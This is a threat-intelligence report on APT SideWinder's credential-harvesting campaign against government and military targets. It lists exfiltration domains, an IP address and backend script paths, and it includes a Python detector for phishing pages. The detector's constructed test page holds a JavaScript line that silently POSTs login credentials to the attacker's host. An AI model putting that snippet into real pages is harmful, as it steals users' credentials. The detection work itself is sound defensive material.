APT SideWinder, a persistent threat actor believed to originate from South Asia, has launched a sophisticated credential harvesting campaign targeting government and military entities across Bangladesh, Nepal, Turkey, and neighboring countries. The group has demonstrated remarkable adaptability in their phishing techniques, creating convincing replicas of official login portals to steal sensitive authentication credentials from high-value targets.
Phishing Techniques and Targeted Entities
The campaign primarily leverages spear-phishing attacks through weaponized documents and malicious links that mimic legitimate government communications. By impersonating trusted institutions, the threat actors successfully trick victims into entering their credentials on fraudulent login pages designed to capture and exfiltrate authentication data to attacker-controlled servers.
Hunt.io analysts identified the operation after investigating a phishing attack targeting Nepal’s Ministry of Defense, which led to the discovery of a broader infrastructure spanning multiple countries and government agencies. The investigation revealed over a dozen phishing domains, each carefully crafted to mimic different agencies including DGDP, DGFI, Bangladesh Police, and Turkish defense contractors like ASELSAN and ROKETSAN.
Infrastructure Analysis and Credential Collection Methods
The technical analysis reveals APT SideWinder’s systematic approach to credential harvesting through centralized collection infrastructure. The group employs two primary credential exfiltration domains: mailbox3-inbox1-bd.com and mailbox-inbox-bd.com, both resolving to IP address 146.70.118.226 hosted by M247 Europe SRL in Frankfurt, Germany.
The phishing pages submit stolen credentials with HTTP POST requests that the victim never sees. For example, a fake Zimbra login page hosted at mail-mod-gov-np-account-file-data.netlify.app contains JavaScript that sends the entered username and password to https://mailbox3-inbox1-bd.com/3456.php through a concealed form submission. The HTML source keeps an authentic title such as “Zimbra Web Client Sign In” to maintain credibility while the page quietly forwards the credentials to the attacker’s backend.
The campaign demonstrates infrastructure reuse across different targeting scenarios: the same backend scripts, such as /2135.php and /idef.php, appear across multiple phishing kits. This template-based approach points to automated deployment, allowing the threat actors to scale operations rapidly and keep collecting credentials even when individual phishing URLs are taken down or blocked.
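A defender-side check for the pattern described above, added here as an example rather than code from Hunt.io’s report: it parses a login page’s HTML, collects every form action and URL referenced in inline scripts, and flags any submission target whose host differs from the page’s own, enriching the finding with the exfiltration domains and backend script paths quoted in this article. The sample HTML is constructed to mimic the fake Zimbra page and is not the kit’s actual source.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Indicators quoted in the report above; extend from your own intel feeds.
KNOWN_EXFIL_HOSTS = {"mailbox3-inbox1-bd.com", "mailbox-inbox-bd.com"}
KNOWN_BACKEND_PATHS = {"/3456.php", "/2135.php", "/idef.php"}
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

class _Collector(HTMLParser):
    """Collects <form action> values and the bodies of inline <script> tags."""
    def __init__(self):
        super().__init__()
        self.actions, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        action = dict(attrs).get("action")
        if tag == "form" and action:
            self.actions.append(action)
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def find_credential_exfil(page_url, html):
    """Return submission targets that leave the page's origin, with reasons."""
    collector = _Collector(); collector.feed(html)
    page_host = urlsplit(page_url).hostname
    candidates = collector.actions + [u for s in collector.scripts for u in URL_RE.findall(s)]
    findings = []
    for target in candidates:
        u = urlsplit(urljoin(page_url, target))
        if u.hostname is None or u.hostname == page_host:
            continue  # same-origin submission is normal for a genuine login page
        reasons = ["cross-origin submission target"]
        if u.hostname in KNOWN_EXFIL_HOSTS:
            reasons.append("known exfiltration host")
        if u.path in KNOWN_BACKEND_PATHS:
            reasons.append("known backend script path")
        findings.append({"target": u.geturl(), "reasons": reasons})
    return findings

# Constructed sample modelled on the fake Zimbra page described above (not the kit's real source).
SAMPLE_PHISH = """<html><head><title>Zimbra Web Client Sign In</title></head><body>
<form id="f" method="post" action="/zimbra/"></form><script>
document.getElementById('f').addEventListener('submit', function (e) { e.preventDefault();
  fetch('https://mailbox3-inbox1-bd.com/3456.php', {method: 'POST', body: new FormData(e.target)}); });
</script></body></html>"""
SAMPLE_LEGIT = """<html><body><form method="post" action="https://mail.example.gov/zimbra/"></form></body></html>"""
```

Run `find_credential_exfil("https://mail-mod-gov-np-account-file-data.netlify.app/", SAMPLE_PHISH)` to see the single cross-origin finding; the same call on SAMPLE_LEGIT with its own host returns an empty list.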
Enhanced Toolset and Tactics
SideWinder’s tactics involve spear-phishing emails with malicious DOCX attachments that exploit the CVE-2017-11882 vulnerability. These documents use remote template injection to download RTF files from attacker-controlled servers, which start a multi-stage infection chain. The resulting malware, known as “Backdoor Loader,” acts as a loader for the “StealerBot” post-exploitation toolkit.
SideWinder continuously updates its tools to evade detection, often within hours of a sample being flagged by security software. This includes changing file names and paths, as well as applying anti-analysis techniques such as control-flow flattening to hinder analysis and detection.
The group’s malware has evolved to include a new version of the “Downloader Module,” which more effectively identifies installed security solutions using advanced WMI queries. It also checks for specific process names associated with popular security software. Additionally, a C++ version of the “Backdoor Loader” has been discovered, indicating a shift towards more customized and targeted attacks.
Targeted Sectors and Regions
SideWinder’s attacks have expanded across various sectors, including telecommunications, consulting, IT services, real estate, and hotels. Geographically, the group has targeted entities in countries such as Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam. Diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda have also been targeted.
SideWinder’s ability to quickly update its tools and evade detection makes it a formidable threat. To counter these attacks, organizations should prioritize patch management and use comprehensive security solutions that include incident detection and response capabilities. Regular employee training on security awareness is also crucial, given the reliance on spear-phishing as an initial attack vector.
As SideWinder continues to evolve, maintaining vigilance and updating security measures will be essential for protecting against these sophisticated cyber threats.